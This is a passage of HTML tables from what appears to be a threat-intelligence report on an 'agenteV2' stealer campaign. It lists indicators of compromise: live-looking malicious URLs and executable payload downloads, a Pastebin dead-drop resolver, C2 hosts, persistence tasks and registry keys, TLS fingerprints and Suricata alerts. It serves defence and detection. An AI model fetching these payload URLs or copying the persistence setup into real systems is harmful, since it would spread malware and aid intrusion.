                    style="                    padding:10px;
                    "
                    >
                                        			Real			C2 server (Contabo VPS, Germany)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			vmi3003111.contaboserver.net                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			FQDN                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			Malicious                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D6"
                    data-col-index="3"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			C2			server hostname                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			172.66.171.73                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			IP                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			Suspicious                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D7"
                    data-col-index="3"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			Cloudflare			proxy for Pastebin not directly malicious                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			pastebin.com/raw/0RmxqY57                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			URL                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			Malicious                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="D8"
                    data-col-index="3"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			Dead-drop			resolver contains plaintext C2 IP:port                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-306'>
table#wpdtSimpleTable-306{ table-layout: fixed !important; }
table#wpdtSimpleTable-306 td, table.wpdtSimpleTable306 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h3 class="wp-block-heading"><br>Malicious URLs</h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-307"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="2"
           data-rows="12"
           data-wpID="307"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:63.486842105263%;                    padding:10px;
                    "
                    >
                                        			URL                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:36.513157894737%;                    padding:10px;
                    "
                    >
                                        			Function                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			https://odaracani.online/index.php?id=3df947b3                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			Gate			unique per-victim tracking ID                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/cert.php                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			Redirect			chain step 1                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/cord.php                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			Redirect			chain step 2                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/br77b/download.php                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			Redirect			to payload landing                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/br77b/arquivos/download.php?id_69bb7d47c15e9                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			Payload			landing page                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/br77b/arquivos/download/base.php?LpHQPCBwX=766760                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			Configuration			/ stage data                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/br77b/arquivos/download/reiniciar.exe                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			Payload:			reiniciar.exe (~6.4 MB)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/br77b/arquivos/download/msedge03.exe                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			Payload:			msedge03.exe                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/br77b/arquivos/download/msedge04.exe                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			Payload:			wifi_driver.exe (served as msedge04.exe)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A11"
                    data-col-index="0"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        			https://nuevaprodeciencia.club/br77b/iayjaskyeiagds.php                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B11"
                    data-col-index="1"
                    data-row-index="10"
                    style="                    padding:10px;
                    "
                    >
                                        			C2			initial checkin endpoint (called by VBS loader)                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="A12"
                    data-col-index="0"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        			https://pastebin.com/raw/0RmxqY57                    </td>
                                                <td class="wpdt-cell wpdt-fs-000012 wpdt-align-left"
                                            data-cell-id="B12"
                    data-col-index="1"
                    data-row-index="11"
                    style="                    padding:10px;
                    "
                    >
                                        			Dead-drop			resolver C2 IP:port                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-307'>
table#wpdtSimpleTable-307{ table-layout: fixed !important; }
table#wpdtSimpleTable-307 td, table.wpdtSimpleTable307 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h3 class="wp-block-heading"><br>Host-Based IOCs</h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-308"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="10"
           data-wpID="308"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-fs-000014 wpdt-bc-03A9F4 wpdt-bold"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:10.787486515642%;                    padding:10px;
                    "
                    >
                                        			Artifact                    </th>
                                                <th class="wpdt-cell wpdt-fs-000014 wpdt-bc-03A9F4 wpdt-bold"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:49.838187702265%;                    padding:10px;
                    "
                    >
                                        			Path			/ Value                    </th>
                                                <th class="wpdt-cell wpdt-fs-000014 wpdt-bc-03A9F4 wpdt-bold"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:39.374325782093%;                    padding:10px;
                    "
                    >
                                        			Notes                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			VBS			Loader (delivered)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			C:\Users\*\Downloads\0124_INTMACAO_.vbs                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			16,739			bytes obfuscated                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			VBS			Loader (decoded)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			C:\Users\*\AppData\Local\Temp\0124_INTMACAO_.vbs                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			140,302			bytes runtime-expanded                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			Container			binary                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			C:\Program			Files (x86)\Wi-fi\wifi_driver.exe                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			13,177,856			bytes onefile bundle                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			Secondary			container                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			C:\Program			Files (x86)\Wi-fi\reiniciar.exe                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			6,685,696			bytes secondary onefile bundle                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			Core			stealer DLL                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			C:\Users\*\AppData\Local\Temp\onefile_*\agenteV2_historico_detect.dll                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			27			MB MD5: 826d6350724f203b911aa6c8c4626391                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			Scheduled			Task                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			RunAsAdmin_AutoUpdate                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			Executes			wifi_driver.exe at logon, /rl highest                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A8"
                    data-col-index="0"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			Scheduled			Task                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B8"
                    data-col-index="1"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			RunAsAdmin_Executar                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C8"
                    data-col-index="2"
                    data-row-index="7"
                    style="                    padding:10px;
                    "
                    >
                                        			Executes			reiniciar.exe at logon, /rl highest                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A9"
                    data-col-index="0"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			Registry			Run                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B9"
                    data-col-index="1"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MonitorSystem                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C9"
                    data-col-index="2"
                    data-row-index="8"
                    style="                    padding:10px;
                    "
                    >
                                        			Value:			...\ONEFIL~1\agenteV2_historico_detect.py                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell "
                                            data-cell-id="A10"
                    data-col-index="0"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			Install			directory                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B10"
                    data-col-index="1"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			C:\Program			Files (x86)\Wi-fi\                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C10"
                    data-col-index="2"
                    data-row-index="9"
                    style="                    padding:10px;
                    "
                    >
                                        			Created			by malware masquerades as Wi-Fi driver folder                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-308'>
table#wpdtSimpleTable-308{ table-layout: fixed !important; }
table#wpdtSimpleTable-308 td, table.wpdtSimpleTable308 th { white-space: normal !important; }
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h3 class="wp-block-heading"><br>TLS / Network Fingerprints</h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-309"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="4"
           data-wpID="309"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:9.4428706326723%;                    padding:10px;
                    "
                    >
                                        			Type                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:50.047214353163%;                    padding:10px;
                    "
                    >
                                        			Value                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:40.509915014164%;                    padding:10px;
                    "
                    >
                                        			Use                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			JA3                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			a48c0d5f95b1ef98f560f324fd275da1                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			Client			TLS fingerprint detect agenteV2 regardless of C2 IP rotation                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			JA3S                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			15af977ce25de452b96affa2addb1036                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			Server			TLS response fingerprint                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			JARM                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			00000000000000000000000000000000000000000000000000000000000000                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			Cloudflare			(Pastebin) not C2 fingerprint                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-309'>
table#wpdtSimpleTable-309{ table-layout: fixed !important; }
table#wpdtSimpleTable-309 td, table.wpdtSimpleTable309 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h3 class="wp-block-heading"><br>IDS/IPS Signatures (Observed Suricata Alerts)</h3>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-310"
           style="border-collapse:collapse;
                   border-spacing:0px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="3"
           data-rows="7"
           data-wpID="310"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:10.209102091021%;                    padding:10px;
                    "
                    >
                                        			SID                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:53.751537515375%;                    padding:10px;
                    "
                    >
                                        			Message                    </th>
                                                <th class="wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:36.039360393604%;                    padding:10px;
                    "
                    >
                                        			Meaning                    </th>
                                        </tr>
                    <tbody>        <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A2"
                    data-col-index="0"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			2022658                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B2"
                    data-col-index="1"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			ET			MALWARE Possible Malicious Macro DL EXE (WinHTTPRequest)                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C2"
                    data-col-index="2"
                    data-row-index="1"
                    style="                    padding:10px;
                    "
                    >
                                        			EXE			download via WinHTTP loader behavior                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A3"
                    data-col-index="0"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			2029840                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B3"
                    data-col-index="1"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			ET			HUNTING Request for EXE via WinHTTP M1                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C3"
                    data-col-index="2"
                    data-row-index="2"
                    style="                    padding:10px;
                    "
                    >
                                        			WinHTTP			EXE request pattern                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A4"
                    data-col-index="0"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			2022896                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B4"
                    data-col-index="1"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			ET			HUNTING SUSPICIOUS Firesale gTLD EXE DL with no Referer                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C4"
                    data-col-index="2"
                    data-row-index="3"
                    style="                    padding:10px;
                    "
                    >
                                        			EXE			from suspicious TLD without Referer                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A5"
                    data-col-index="0"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			2019822                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B5"
                    data-col-index="1"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			ET			INFO WinHttpRequest Downloading EXE                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C5"
                    data-col-index="2"
                    data-row-index="4"
                    style="                    padding:10px;
                    "
                    >
                                        			Confirms			WinHTTP EXE download                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A6"
                    data-col-index="0"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			2019823                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B6"
                    data-col-index="1"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			ET			EXPLOIT_KIT WinHttpRequest Downloading EXE Non-Port 80                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C6"
                    data-col-index="2"
                    data-row-index="5"
                    style="                    padding:10px;
                    "
                    >
                                        			EXE			download on non-standard port                    </td>
                                        </tr>
                            <tr class="wpdt-cell-row " >
                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="A7"
                    data-col-index="0"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			85005610                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="B7"
                    data-col-index="1"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			ET			INFO PE EXE or DLL Windows file download HTTP                    </td>
                                                <td class="wpdt-cell wpdt-align-left wpdt-fs-000012"
                                            data-cell-id="C7"
                    data-col-index="2"
                    data-row-index="6"
                    style="                    padding:10px;
                    "
                    >
                                        			PE			file transfer over HTTP                    </td>
                                        </tr>
                    </table>
</div><style id='wpdt-custom-style-310'>
table#wpdtSimpleTable-310{ table-layout: fixed !important; }
table#wpdtSimpleTable-310 td, table.wpdtSimpleTable310 th { white-space: normal !important; }
.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}
.wpdt-fs-000014 { font-size: 14px !important;}
.wpdt-fs-000012 { font-size: 12px !important;}
</style>




<h2 class="wp-block-heading"><br>MITRE ATT&amp;CK Mapping</h2>



<div class="wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper
"
    >
        <table id="wpdtSimpleTable-311"
           style="border-collapse:collapse;
                   border-spacing:3px;"
           class="wpdtSimpleTable wpDataTable"
           data-column="5"
           data-rows="22"
           data-wpID="311"
           data-responsive="0"
           data-has-header="1">

                    <thead>        <tr class="wpdt-cell-row " >
                                <th class="wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="A1"
                    data-col-index="0"
                    data-row-index="0"
                    style=" width:9.2307692307692%;                    padding:10px;
                    "
                    >
                                        			Technique			ID                    </th>
                                                <th class="wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="B1"
                    data-col-index="1"
                    data-row-index="0"
                    style=" width:22.081447963801%;                    padding:10px;
                    "
                    >
                                        			Name                    </th>
                                                <th class="wpdt-cell wpdt-bc-E91E63 wpdt-bold wpdt-fs-000014"
                                            data-cell-id="C1"
                    data-col-index="2"
                    data-row-index="0"
                    style=" width:13.665158371041%;                    padding:10px;
                    "
                    >
